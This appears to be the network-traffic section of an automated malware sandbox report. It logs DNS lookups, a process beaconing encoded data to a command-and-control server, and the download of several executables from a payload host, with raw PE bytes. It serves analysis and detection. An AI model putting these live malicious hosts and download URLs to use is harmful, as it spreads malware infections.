Sep 21, 2024 14:48:10.966936111 CEST	1.1.1.1	192.168.2.9	0x560	No error (0)	bbuseruploads.s3.amazonaws.com	s3-1-w.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 21, 2024 14:48:10.966936111 CEST	1.1.1.1	192.168.2.9	0x560	No error (0)	s3-1-w.amazonaws.com	s3-w.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 21, 2024 14:48:10.966936111 CEST	1.1.1.1	192.168.2.9	0x560	No error (0)	s3-w.us-east-1.amazonaws.com		54.231.236.201	A (IP address)	IN (0x0001)	false
Sep 21, 2024 14:48:10.966936111 CEST	1.1.1.1	192.168.2.9	0x560	No error (0)	s3-w.us-east-1.amazonaws.com		16.182.72.249	A (IP address)	IN (0x0001)	false
Sep 21, 2024 14:48:10.966936111 CEST	1.1.1.1	192.168.2.9	0x560	No error (0)	s3-w.us-east-1.amazonaws.com		52.217.131.129	A (IP address)	IN (0x0001)	false
Sep 21, 2024 14:48:10.966936111 CEST	1.1.1.1	192.168.2.9	0x560	No error (0)	s3-w.us-east-1.amazonaws.com		3.5.30.133	A (IP address)	IN (0x0001)	false
Sep 21, 2024 14:48:10.966936111 CEST	1.1.1.1	192.168.2.9	0x560	No error (0)	s3-w.us-east-1.amazonaws.com		54.231.204.121	A (IP address)	IN (0x0001)	false
Sep 21, 2024 14:48:10.966936111 CEST	1.1.1.1	192.168.2.9	0x560	No error (0)	s3-w.us-east-1.amazonaws.com		52.217.83.60	A (IP address)	IN (0x0001)	false
Sep 21, 2024 14:48:10.966936111 CEST	1.1.1.1	192.168.2.9	0x560	No error (0)	s3-w.us-east-1.amazonaws.com		52.217.132.1	A (IP address)	IN (0x0001)	false
Sep 21, 2024 14:48:10.966936111 CEST	1.1.1.1	192.168.2.9	0x560	No error (0)	s3-w.us-east-1.amazonaws.com		16.182.39.1	A (IP address)	IN (0x0001)	false
Sep 21, 2024 14:48:31.756347895 CEST	1.1.1.1	192.168.2.9	0x5491	No error (0)	iplogger.org		172.67.74.161	A (IP address)	IN (0x0001)	false
Sep 21, 2024 14:48:31.756347895 CEST	1.1.1.1	192.168.2.9	0x5491	No error (0)	iplogger.org		104.26.2.46	A (IP address)	IN (0x0001)	false
Sep 21, 2024 14:48:31.756347895 CEST	1.1.1.1	192.168.2.9	0x5491	No error (0)	iplogger.org		104.26.3.46	A (IP address)	IN (0x0001)	false
Sep 21, 2024 14:48:39.056900978 CEST	1.1.1.1	192.168.2.9	0x3229	No error (0)	steamcommunity.com		23.197.127.21	A (IP address)	IN (0x0001)	false
Sep 21, 2024 14:48:40.481028080 CEST	1.1.1.1	192.168.2.9	0x7737	No error (0)	tventyvf20pt.top		5.53.124.195	A (IP address)	IN (0x0001)	false
Sep 21, 2024 14:48:40.481049061 CEST	1.1.1.1	192.168.2.9	0x7737	No error (0)	tventyvf20pt.top		5.53.124.195	A (IP address)	IN (0x0001)	false
Sep 21, 2024 14:49:33.744225025 CEST	1.1.1.1	192.168.2.9	0x54af	Name error (3)	sentistivowmi.shop	none	none	A (IP address)	IN (0x0001)	false
Sep 21, 2024 14:49:36.313438892 CEST	91.211.247.248	192.168.2.9	0xebba	No error (0)	ckmqpoy.net		185.196.8.214	A (IP address)	IN (0x0001)	false
Sep 21, 2024 14:49:38.984477043 CEST	1.1.1.1	192.168.2.9	0x2f05	No error (0)	cowod.hopto.org		45.132.206.251	A (IP address)	IN (0x0001)	false
Sep 21, 2024 14:49:42.538557053 CEST	1.1.1.1	192.168.2.9	0x92d1	No error (0)	steamcommunity.com		23.197.127.21	A (IP address)	IN (0x0001)	false
Sep 21, 2024 14:50:16.560040951 CEST	1.1.1.1	192.168.2.9	0xa614	No error (0)	nwgrus.ru		62.150.232.50	A (IP address)	IN (0x0001)	false
Sep 21, 2024 14:50:16.560040951 CEST	1.1.1.1	192.168.2.9	0xa614	No error (0)	nwgrus.ru		189.181.24.82	A (IP address)	IN (0x0001)	false
Sep 21, 2024 14:50:16.560040951 CEST	1.1.1.1	192.168.2.9	0xa614	No error (0)	nwgrus.ru		181.204.98.226	A (IP address)	IN (0x0001)	false
Sep 21, 2024 14:50:16.560040951 CEST	1.1.1.1	192.168.2.9	0xa614	No error (0)	nwgrus.ru		183.100.39.16	A (IP address)	IN (0x0001)	false
Sep 21, 2024 14:50:16.560040951 CEST	1.1.1.1	192.168.2.9	0xa614	No error (0)	nwgrus.ru		181.28.104.6	A (IP address)	IN (0x0001)	false
Sep 21, 2024 14:50:16.560040951 CEST	1.1.1.1	192.168.2.9	0xa614	No error (0)	nwgrus.ru		119.204.11.2	A (IP address)	IN (0x0001)	false
Sep 21, 2024 14:50:16.560040951 CEST	1.1.1.1	192.168.2.9	0xa614	No error (0)	nwgrus.ru		211.181.24.132	A (IP address)	IN (0x0001)	false
Sep 21, 2024 14:50:16.560040951 CEST	1.1.1.1	192.168.2.9	0xa614	No error (0)	nwgrus.ru		177.222.41.236	A (IP address)	IN (0x0001)	false
Sep 21, 2024 14:50:16.560040951 CEST	1.1.1.1	192.168.2.9	0xa614	No error (0)	nwgrus.ru		185.18.245.58	A (IP address)	IN (0x0001)	false
Sep 21, 2024 14:50:16.560040951 CEST	1.1.1.1	192.168.2.9	0xa614	No error (0)	nwgrus.ru		46.100.50.5	A (IP address)	IN (0x0001)	false
Sep 21, 2024 14:50:16.560072899 CEST	1.1.1.1	192.168.2.9	0xa614	No error (0)	nwgrus.ru		62.150.232.50	A (IP address)	IN (0x0001)	false
Sep 21, 2024 14:50:16.560072899 CEST	1.1.1.1	192.168.2.9	0xa614	No error (0)	nwgrus.ru		189.181.24.82	A (IP address)	IN (0x0001)	false
Sep 21, 2024 14:50:16.560072899 CEST	1.1.1.1	192.168.2.9	0xa614	No error (0)	nwgrus.ru		181.204.98.226	A (IP address)	IN (0x0001)	false
Sep 21, 2024 14:50:16.560072899 CEST	1.1.1.1	192.168.2.9	0xa614	No error (0)	nwgrus.ru		183.100.39.16	A (IP address)	IN (0x0001)	false
Sep 21, 2024 14:50:16.560072899 CEST	1.1.1.1	192.168.2.9	0xa614	No error (0)	nwgrus.ru		181.28.104.6	A (IP address)	IN (0x0001)	false
Sep 21, 2024 14:50:16.560072899 CEST	1.1.1.1	192.168.2.9	0xa614	No error (0)	nwgrus.ru		119.204.11.2	A (IP address)	IN (0x0001)	false
Sep 21, 2024 14:50:16.560072899 CEST	1.1.1.1	192.168.2.9	0xa614	No error (0)	nwgrus.ru		211.181.24.132	A (IP address)	IN (0x0001)	false
Sep 21, 2024 14:50:16.560072899 CEST	1.1.1.1	192.168.2.9	0xa614	No error (0)	nwgrus.ru		177.222.41.236	A (IP address)	IN (0x0001)	false
Sep 21, 2024 14:50:16.560072899 CEST	1.1.1.1	192.168.2.9	0xa614	No error (0)	nwgrus.ru		185.18.245.58	A (IP address)	IN (0x0001)	false
Sep 21, 2024 14:50:16.560072899 CEST	1.1.1.1	192.168.2.9	0xa614	No error (0)	nwgrus.ru		46.100.50.5	A (IP address)	IN (0x0001)	false
Sep 21, 2024 14:50:16.560237885 CEST	1.1.1.1	192.168.2.9	0xa614	No error (0)	nwgrus.ru		62.150.232.50	A (IP address)	IN (0x0001)	false
Sep 21, 2024 14:50:16.560237885 CEST	1.1.1.1	192.168.2.9	0xa614	No error (0)	nwgrus.ru		189.181.24.82	A (IP address)	IN (0x0001)	false
Sep 21, 2024 14:50:16.560237885 CEST	1.1.1.1	192.168.2.9	0xa614	No error (0)	nwgrus.ru		181.204.98.226	A (IP address)	IN (0x0001)	false
Sep 21, 2024 14:50:16.560237885 CEST	1.1.1.1	192.168.2.9	0xa614	No error (0)	nwgrus.ru		183.100.39.16	A (IP address)	IN (0x0001)	false
Sep 21, 2024 14:50:16.560237885 CEST	1.1.1.1	192.168.2.9	0xa614	No error (0)	nwgrus.ru		181.28.104.6	A (IP address)	IN (0x0001)	false
Sep 21, 2024 14:50:16.560237885 CEST	1.1.1.1	192.168.2.9	0xa614	No error (0)	nwgrus.ru		119.204.11.2	A (IP address)	IN (0x0001)	false
Sep 21, 2024 14:50:16.560237885 CEST	1.1.1.1	192.168.2.9	0xa614	No error (0)	nwgrus.ru		211.181.24.132	A (IP address)	IN (0x0001)	false
Sep 21, 2024 14:50:16.560237885 CEST	1.1.1.1	192.168.2.9	0xa614	No error (0)	nwgrus.ru		177.222.41.236	A (IP address)	IN (0x0001)	false
Sep 21, 2024 14:50:16.560237885 CEST	1.1.1.1	192.168.2.9	0xa614	No error (0)	nwgrus.ru		185.18.245.58	A (IP address)	IN (0x0001)	false
Sep 21, 2024 14:50:16.560237885 CEST	1.1.1.1	192.168.2.9	0xa614	No error (0)	nwgrus.ru		46.100.50.5	A (IP address)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49706	41.216.188.190	80	7504	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Sep 21, 2024 14:48:01.256000042 CEST	204	OUT	GET /api/wp-ping.php HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 41.216.188.190
Sep 21, 2024 14:48:01.969233990 CEST	259	IN	HTTP/1.1 200 OK Date: Sat, 21 Sep 2024 12:48:01 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 6 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 66 69 73 68 31 35 Data Ascii: fish15
Sep 21, 2024 14:48:05.728488922 CEST	276	OUT	POST /api/wp-admin.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Content-Length: 133 Host: 41.216.188.190
Sep 21, 2024 14:48:05.728488922 CEST	133	OUT	Data Raw: 64 61 74 61 3d 4d 6f 54 5f 44 74 6d 4d 4f 30 2d 61 53 66 65 76 2d 56 6d 50 63 34 54 6d 4a 2d 6b 57 35 56 68 52 78 63 4e 45 69 2d 42 46 5a 50 73 73 68 73 57 6b 41 35 58 59 55 62 51 57 73 57 5f 32 72 50 6e 4a 41 76 4f 51 41 2d 72 33 2d 65 68 66 51 Data Ascii: data=MoT_DtmMO0-aSfev-VmPc4TmJ-kW5VhRxcNEi-BFZPsshsWkA5XYUbQWsW_2rPnJAvOQA-r3-ehfQOSiqiXVuJrTMI4EoDyjAD2W99qR4U1QNbaVwdfX_NeBMiEpg8t0
Sep 21, 2024 14:48:06.375173092 CEST	362	IN	HTTP/1.1 200 OK Date: Sat, 21 Sep 2024 12:48:05 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 108 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 34 4a 37 6d 4e 57 41 4f 49 6f 71 30 68 61 44 36 74 48 2b 35 4c 46 37 71 70 46 38 6b 33 33 6c 6e 6f 59 53 35 73 4c 76 49 5a 59 51 6e 2f 4e 77 42 56 43 69 49 30 4e 74 57 50 54 4c 30 45 32 4b 5a 63 4b 6a 6f 34 78 47 6b 71 73 37 7a 30 34 33 68 41 64 76 32 64 68 56 53 45 58 6c 6e 50 35 2b 6e 76 6c 66 46 68 68 71 64 5a 43 55 3d Data Ascii: 4J7mNWAOIoq0haD6tH+5LF7qpF8k33lnoYS5sLvIZYQn/NwBVCiI0NtWPTL0E2KZcKjo4xGkqs7z043hAdv2dhVSEXlnP5+nvlfFhhqdZCU=
Sep 21, 2024 14:48:06.502520084 CEST	276	OUT	POST /api/wp-admin.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Content-Length: 133 Host: 41.216.188.190
Sep 21, 2024 14:48:06.502520084 CEST	133	OUT	Data Raw: 64 61 74 61 3d 7a 42 6a 49 6f 43 68 4b 38 32 4e 6a 45 37 43 37 44 46 58 71 42 35 66 72 73 76 50 73 69 4f 6f 59 46 55 46 57 49 52 6d 5f 58 6c 55 7a 68 67 68 39 71 51 52 5f 30 42 4a 54 4a 6d 77 76 58 65 39 38 2d 6c 4f 56 71 6e 4c 44 45 54 62 68 61 Data Ascii: data=zBjIoChK82NjE7C7DFXqB5frsvPsiOoYFUFWIRm_XlUzhgh9qQR_0BJTJmwvXe98-lOVqnLDETbhaI13EJCUKrZ2iGxaRHSo-wl9hz2UJxEh5Q4S9InkXOBg2d9WSVnZ
Sep 21, 2024 14:48:07.555862904 CEST	1236	IN	HTTP/1.1 200 OK Date: Sat, 21 Sep 2024 12:48:06 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 2368 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 6d 76 7a 4b 64 5a 43 31 69 77 59 45 34 4e 45 50 4f 43 75 43 32 53 51 55 6d 51 73 4d 43 53 63 2b 41 30 4c 6f 58 52 4c 52 30 44 62 69 30 4e 62 43 76 53 59 53 31 70 36 46 6f 56 42 68 31 66 31 4e 4d 67 6f 48 54 77 53 65 7a 74 48 43 6e 50 34 35 72 54 78 73 32 45 39 33 52 47 4f 5a 38 66 4a 4d 37 77 63 34 50 4d 54 79 79 6b 68 45 5a 4e 64 4e 47 34 63 51 6a 36 61 44 57 50 37 57 47 32 6b 6e 67 61 38 6c 2b 6c 59 62 4a 7a 41 48 72 37 6b 6d 4a 77 73 65 52 4d 46 30 6f 4f 48 58 45 6d 5a 46 46 69 48 6d 2b 52 56 73 67 6f 56 4a 41 47 6f 5a 71 79 75 4f 2b 61 37 65 35 66 37 37 61 30 74 43 48 55 52 75 75 66 6f 6c 70 69 71 48 42 76 34 2f 4e 74 42 39 58 44 66 4e 4b 55 71 78 35 61 56 62 63 4f 47 38 2f 5a 45 67 2b 63 2f 45 38 6c 4f 47 35 73 2b 59 42 50 4a 61 6a 48 38 4a 63 74 4e 37 74 6e 61 44 50 47 75 56 57 37 6f 4f 33 73 78 6a 42 61 6e 41 65 52 46 2f 33 37 71 4c 6f 57 76 69 57 74 4d 6e 71 74 53 54 51 6e 41 32 58 4c 2f 6d 6e 6a 42 44 53 41 5a 70 4a 64 6c 50 7a 31 72 37 41 4e 6a 4e 35 79 6d 48 39 2f 42 75 43 34 35 75 6f 57 [TRUNCATED] Data Ascii: mvzKdZC1iwYE4NEPOCuC2SQUmQsMCSc+A0LoXRLR0Dbi0NbCvSYS1p6FoVBh1f1NMgoHTwSeztHCnP45rTxs2E93RGOZ8fJM7wc4PMTyykhEZNdNG4cQj6aDWP7WG2knga8l+lYbJzAHr7kmJwseRMF0oOHXEmZFFiHm+RVsgoVJAGoZqyuO+a7e5f77a0tCHURuufolpiqHBv4/NtB9XDfNKUqx5aVbcOG8/ZEg+c/E8lOG5s+YBPJajH8JctN7tnaDPGuVW7oO3sxjBanAeRF/37qLoWviWtMnqtSTQnA2XL/mnjBDSAZpJdlPz1r7ANjN5ymH9/BuC45uoWFBZdsd2ylUoPdEbfz0Pe/wStaYZShjt8mhG+XSCrFGxIWGaI6E1BAtsUILJ6V3817zmfcMS2/kn0aOkAwTjD3qh5pdQaNKyljxMfLjjIrW/EVEYjg3/i4S4GPhheqbhPaWeNLIUIImqj9BXHN8eBDZkPEImy+uipI2x+40DZ1ZjmGa8jiTNRlOUTCn0LT0ZcfB1/VV1Z+zsVP2TvEcTl9hqpF5Wg7ua0+X/npmhuOL58kdmiidPh8Y7yW8+1pIvAc5PXuSJNbwrkWctKWzWIFMlQu9xo5QacHOdwMe5y662BqRMGYIWdDg4Eb+qR/RvTi5OM43wmqgCiU+3qzCv8lfZ05508IBIamK8ZXLC7Ae8UxuUJkTUSDupKQvSjmuZwn8pNlUuT5wx5DVNEe+kCfFiv3FmDEYSiI4Xucz8he7q/tE9bpmpRYFYeg/D0ajEB+LumUbi9kTR5o3uhUb7Y7NXmYO432z4WVqNbZalOcbdlIm1GlLdx6tDFq3qGl/LeDWWz1Exy1zEtePnWhQvFUiPOZGfad2Y94NVJ+0k9rBca4UcY6xUWja02GxCVt8SB1sB/11PHNjFs4LSIT1rScjIFUvGfH72Z7W/mPsVZVkeZCLuJCkp/myg987m7ndlirq0
Sep 21, 2024 14:48:07.555888891 CEST	1236	IN	Data Raw: 33 6c 48 57 63 6b 65 61 4f 37 41 7a 57 42 56 61 4c 54 32 6b 57 4b 47 57 52 79 77 4e 4e 62 67 41 63 76 4d 52 65 61 33 49 6e 6f 50 30 4b 57 4e 6d 66 38 76 63 64 71 46 49 32 6d 6f 48 46 55 30 59 6f 34 6c 58 4b 43 66 57 67 50 46 64 2f 50 52 49 45 77 Data Ascii: 3lHWckeaO7AzWBVaLT2kWKGWRywNNbgAcvMRea3InoP0KWNmf8vcdqFI2moHFU0Yo4lXKCfWgPFd/PRIEwXK6R0ZwlyInuQzoM5b8dTAOG1heQw8Jo5pXL2OMboh7Tg/8xzZ10ZwtizM+rxvz0e/FrWBf5W1shjRw91MoIOJsA9M7q5cFxiDt4umiykIHDw78ea5/oZhdL2y2nZS8VweBsTBeJ/I3uBU/mBi5q0ftLr0m5XZCLa
Sep 21, 2024 14:48:07.555906057 CEST	151	IN	Data Raw: 58 49 34 37 38 4f 46 52 4d 4c 68 54 43 55 4b 2b 75 4a 4c 50 66 74 34 32 47 49 51 45 70 49 55 6a 6e 70 31 6b 41 39 32 4a 4c 38 34 59 6b 6c 5a 42 59 2b 2b 4c 37 6e 54 31 65 6b 31 36 77 4b 64 36 35 64 45 69 38 42 6e 39 57 66 44 55 72 73 69 50 30 44 Data Ascii: XI478OFRMLhTCUK+uJLPft42GIQEpIUjnp1kA92JL84YklZBY++L7nT1ek16wKd65dEi8Bn9WfDUrsiP0DAJILF7nyJxR4B5eOoCKPQLarHPx4oMnW3WB2La29US65JRK3oX/mrT4Pcw1E1S9QjB1B5

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	49709	147.45.44.104	80	7504	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Sep 21, 2024 14:48:08.254848957 CEST	217	OUT	HEAD /prog/66e705d09b33c_jack.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 147.45.44.104 Cache-Control: no-cache
Sep 21, 2024 14:48:08.841861010 CEST	311	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 12:48:08 GMT Content-Type: application/octet-stream Content-Length: 4249600 Last-Modified: Sun, 15 Sep 2024 16:05:36 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66e705d0-40d800" X-Content-Type-Options: nosniff Accept-Ranges: bytes
Sep 21, 2024 14:48:08.842827082 CEST	238	OUT	HEAD /yuop/66eea6336b153_app16540406983468141987.exe#1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 147.45.44.104 Cache-Control: no-cache
Sep 21, 2024 14:48:09.024888992 CEST	309	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 12:48:08 GMT Content-Type: application/octet-stream Content-Length: 331640 Last-Modified: Sat, 21 Sep 2024 10:55:47 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66eea633-50f78" X-Content-Type-Options: nosniff Accept-Ranges: bytes
Sep 21, 2024 14:48:09.025619984 CEST	224	OUT	HEAD /yuop/66edb89bc4073_crypted.exe#xin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 147.45.44.104 Cache-Control: no-cache
Sep 21, 2024 14:48:09.208009958 CEST	309	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 12:48:09 GMT Content-Type: application/octet-stream Content-Length: 361336 Last-Modified: Fri, 20 Sep 2024 18:02:03 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66edb89b-58378" X-Content-Type-Options: nosniff Accept-Ranges: bytes
Sep 21, 2024 14:48:09.208270073 CEST	217	OUT	HEAD /yuop/66ed9885d9aee_Day2.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 147.45.44.104 Cache-Control: no-cache
Sep 21, 2024 14:48:09.391180992 CEST	311	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 12:48:09 GMT Content-Type: application/octet-stream Content-Length: 3141632 Last-Modified: Fri, 20 Sep 2024 15:45:09 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66ed9885-2ff000" X-Content-Type-Options: nosniff Accept-Ranges: bytes
Sep 21, 2024 14:48:09.391463041 CEST	227	OUT	GET /yuop/66ee79315857f_setup33333.exe#lyla HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 147.45.44.104 Cache-Control: no-cache
Sep 21, 2024 14:48:09.573689938 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 12:48:09 GMT Content-Type: application/octet-stream Content-Length: 418816 Last-Modified: Sat, 21 Sep 2024 07:43:45 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66ee7931-66400" X-Content-Type-Options: nosniff Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4d ba df d9 09 db b1 8a 09 db b1 8a 09 db b1 8a 66 ad 1a 8a 1b db b1 8a 66 ad 2f 8a 06 db b1 8a 66 ad 1b 8a 5c db b1 8a 00 a3 22 8a 02 db b1 8a 09 db b0 8a 86 db b1 8a 66 ad 1e 8a 08 db b1 8a 66 ad 2b 8a 08 db b1 8a 66 ad 2c 8a 08 db b1 8a 52 69 63 68 09 db b1 8a 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 12 f6 25 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 48 03 00 00 b4 04 02 00 00 00 00 7e 3e 00 00 00 10 00 00 00 60 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 d0 07 02 00 04 00 00 c5 b4 06 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$Mff/f\"ff+f,RichPEL%dH~>`@JxLK*@$.textjGH `.data`ZL@.rsrc@@
Sep 21, 2024 14:48:09.573700905 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: pSZSNS<S*S\|SN N8NLNfNNNNNNNOOO.O@OTOdOzOOOOOOOP"P0PJPZP
Sep 21, 2024 14:48:09.573710918 CEST	1236	IN	Data Raw: 00 6f 00 66 00 20 00 63 00 61 00 6c 00 6c 00 69 00 6e 00 67 00 20 00 61 00 6e 00 20 00 4d 00 53 00 49 00 4c 00 2d 00 63 00 6f 00 6d 00 70 00 69 00 6c 00 65 00 64 00 20 00 28 00 2f 00 63 00 6c 00 72 00 29 00 20 00 66 00 75 00 6e 00 63 00 74 00 69 Data Ascii: of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.R6032- not enough space for l
Sep 21, 2024 14:48:09.573772907 CEST	1236	IN	Data Raw: 00 74 00 65 00 64 00 20 00 6d 00 75 00 6c 00 74 00 69 00 74 00 68 00 72 00 65 00 61 00 64 00 20 00 6c 00 6f 00 63 00 6b 00 20 00 65 00 72 00 72 00 6f 00 72 00 0d 00 0a 00 00 00 00 00 00 00 00 00 52 00 36 00 30 00 31 00 36 00 0d 00 0a 00 2d 00 20 Data Ascii: ted multithread lock errorR6016- not enough space for thread dataR6010- abort() has been calledR6009-
Sep 21, 2024 14:48:09.573786020 CEST	896	IN	Data Raw: 00 73 00 73 00 00 00 00 00 64 00 64 00 64 00 64 00 2c 00 20 00 4d 00 4d 00 4d 00 4d 00 20 00 64 00 64 00 2c 00 20 00 79 00 79 00 79 00 79 00 00 00 4d 00 4d 00 2f 00 64 00 64 00 2f 00 79 00 79 00 00 00 00 00 50 00 4d 00 00 00 00 00 41 00 4d 00 00 Data Ascii: ssdddd, MMMM dd, yyyyMM/dd/yyPMAMDecemberNovemberOctoberSeptemberAugustJulyJuneAprilMarchFebruary
Sep 21, 2024 14:48:09.573822975 CEST	1236	IN	Data Raw: 3c 3d 3e 3f 40 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 5b 5c 5d 5e 5f 60 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 7b 7c 7d 7e 7f 00 c8 c2 43 00 20 c3 43 00 00 00 00 00 00 Data Ascii: <=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{\|}~C C
Sep 21, 2024 14:48:09.573839903 CEST	1236	IN	Data Raw: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 10 00 01 01 01 01 01 01 01 01 01 01 01 01 01 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 Data Ascii:
Sep 21, 2024 14:48:09.573930979 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 46 00 00 20 6b 00 00 b0 8a 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: F k4UH\E@EmCSEmCV3EWEMumC]EmC?EE EEEDMuD@.
Sep 21, 2024 14:48:09.573941946 CEST	1236	IN	Data Raw: a1 20 fb 44 02 8a 84 38 4b 13 01 00 8b 0d 74 e7 44 02 88 04 39 81 3d e4 ec 44 02 90 04 00 00 75 3f 56 56 8d 45 fc 50 ff 15 2c 10 40 00 56 56 ff 15 10 10 40 00 56 56 56 56 ff 15 f0 10 40 00 56 56 56 ff 15 d0 10 40 00 8d 45 f4 50 56 8d 45 e0 50 56 Data Ascii: D8KtD9=Du?VVEP,@VV@VVVV@VVV@EPVEPV@VV@G;=Dr3D=u*VPVVVV@V@VV(@VVV@G\|3V@auuE<EtDGt\|j{_=DuQV`@V
Sep 21, 2024 14:48:09.573952913 CEST	1236	IN	Data Raw: b8 5b 11 c0 04 f7 65 e0 8b 45 e0 81 6d 98 3d 26 d9 07 b8 99 ee 68 60 f7 a5 7c ff ff ff 8b 85 7c ff ff ff 81 6d ec 16 8f 4d 4c 81 ad 44 ff ff ff 06 b8 8f 6f 81 6d a0 f4 53 2c 42 b8 c8 3c 68 23 f7 a5 74 ff ff ff 8b 85 74 ff ff ff 81 85 44 ff ff ff Data Ascii: [eEm=&h`\|\|mMLDomS,B<h#ttD~m:H)<<]44Whhm]ll<"eEE'lS<Zvlcd/5K&=eEx
Sep 21, 2024 14:48:09.574527979 CEST	552	IN	Data Raw: cc 57 8b 7c 24 08 eb 6e 8d a4 24 00 00 00 00 8b ff 8b 4c 24 04 57 f7 c1 03 00 00 00 74 13 8a 01 83 c1 01 84 c0 74 3d f7 c1 03 00 00 00 75 ef 8b ff 8b 01 ba ff fe fe 7e 03 d0 83 f0 ff 33 c2 83 c1 04 a9 00 01 01 81 74 e8 8b 41 fc 84 c0 74 23 84 e4 Data Ascii: W\|$n$L$Wtt=u~3tAt#tttyyyyL$ttfu~3tt4t'ttD$_fD$G_fD$_
Sep 21, 2024 14:48:10.107702017 CEST	237	OUT	GET /yuop/66eea6336b153_app16540406983468141987.exe#1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 147.45.44.104 Cache-Control: no-cache
